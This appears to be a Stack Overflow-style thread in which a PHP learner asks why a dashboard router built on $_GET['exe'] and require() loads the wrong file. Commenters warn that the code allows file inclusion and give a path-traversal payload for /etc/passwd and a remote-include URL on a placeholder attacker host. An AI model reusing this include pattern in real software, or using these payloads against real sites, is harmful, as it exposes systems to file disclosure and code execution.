# My query string is not working as I wanted

Tags: php, .htaccess, url, url-rewriting

I have a dashboard for admins to insert posts in a project.

I do my navigation in my admin folder with $exe variable, like: dashboard.php?exe=posts/index

And than I have this script to do my query string:

```
if(empty($_GET['exe'])){
    require('inc/home.php');
}
elseif(file_exists($_GET['exe'].'.php')){
    require($_GET['exe'].'.php');
}
else{
    require('inc/404.php');
}
```

And it is working fine, when I dont pass any $exe variable I get my home if I pass an $exe variable I get my file if it exists and if dont exists I get my 404.php file.

The problem is:

If I acess this url: htttp://localhost/backend/admin/posts/index.php I get my home, because I didnt pass any $exe to my url.

But if I acess this url: htttp://localhost/backend/admin/posts/index

Im getting my  index.php file that is outside my admin folder, and I dont want this, but Im not understanding why this is happening.

Do you know what can I do to fix this?

My project folder is like:

1 index.php file

1 folder admin

1 folder js where I have my jquerys

1 folder database, where I have my connection, etc,

1 folder template, where I have my project template

1 file .htaccess

Comment: ouch... so you know if i do something like ?exe=../../../../../etc/passwd%00 then I get your passwd file? but what is the folder structure like?

Comment: Also, if `allow_url_include` and `allow_url_fopen` are enabled on your server, you're open to pretty much *any* form of attack. e.g. `?exe=http://evilserver.com/hackmysite`

Comment: Thanks for your answer xxcezz, I update my question with my folder structure. And I really didnt understand whay are you talking about get my passwd file :/. Can you explain better? Im still learning php and I thought Im doing this correct!

Comment: Never trust a User Input. Read about Code Injection: http://en.wikipedia.org/wiki/Code_injection

Comment: Thanks for your answer Christian Gollhardt. But Im dont have none user input in my example!

Comment: @Marby `$_GET['exe']` is user input. It may not come from a form submission, but it still part of the user's request. A savy or unscrupulous user could craft that request any way they like (and if someone wanted to attack your site, they most definitely would try the methods described above). Even if it's not an attack, a subtle bug or other error could cause all kinds of havoc for unsuspecting users.